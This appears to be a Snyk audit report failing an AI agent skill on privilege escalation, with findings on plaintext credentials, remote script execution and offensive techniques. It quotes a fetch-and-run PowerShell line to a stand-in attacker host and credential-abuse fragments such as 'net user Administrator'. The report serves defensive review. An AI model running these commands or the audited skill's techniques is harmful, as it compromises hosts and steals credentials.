Privilege Escalation Methods

Fail

Audited by Snyk on Feb 15, 2026

Risk Level: CRITICAL

Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). This skill includes and instructs use of plaintext credentials and secret hashes directly in commands and examples (e.g., user:password, Password123, /rc4:<NTLM_HASH>, net user Administrator Password!@#), meaning an agent would need to accept and emit secret values verbatim — creating a high exfiltration risk.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). The facebook.com link is benign by itself, but the presence of http://attacker/shell.ps1 — a direct, untrusted PowerShell (.ps1) file served over plain HTTP from an attacker-controlled host — is a clear high-risk malware distribution indicator, so the overall set is suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The content provides explicit, step-by-step offensive techniques (Linux/Windows privilege escalation, credential harvesting, Kerberoasting, Golden Ticket creation, token impersonation, remote code execution, persistence, and data exfiltration) and references powerful post-exploitation tools (Mimikatz, Responder, Rubeus, Impacket, etc.), enabling unauthorized system compromise and credential theft.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill contains a scheduled-task example that runs PowerShell to execute a remote script via "iex (iwr http://attacker/shell.ps1)", which fetches and executes remote code at runtime and is relied upon by the task.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (e.g., setuid binaries, chmod +s, modify cron/system services, create scheduled tasks and new users, load drivers, extract credentials and create persistence), which directly modifies system state and encourages compromising the host.

Audit Metadata

Risk Level: CRITICAL
Analyzed: Feb 15, 2026, 08:23 PM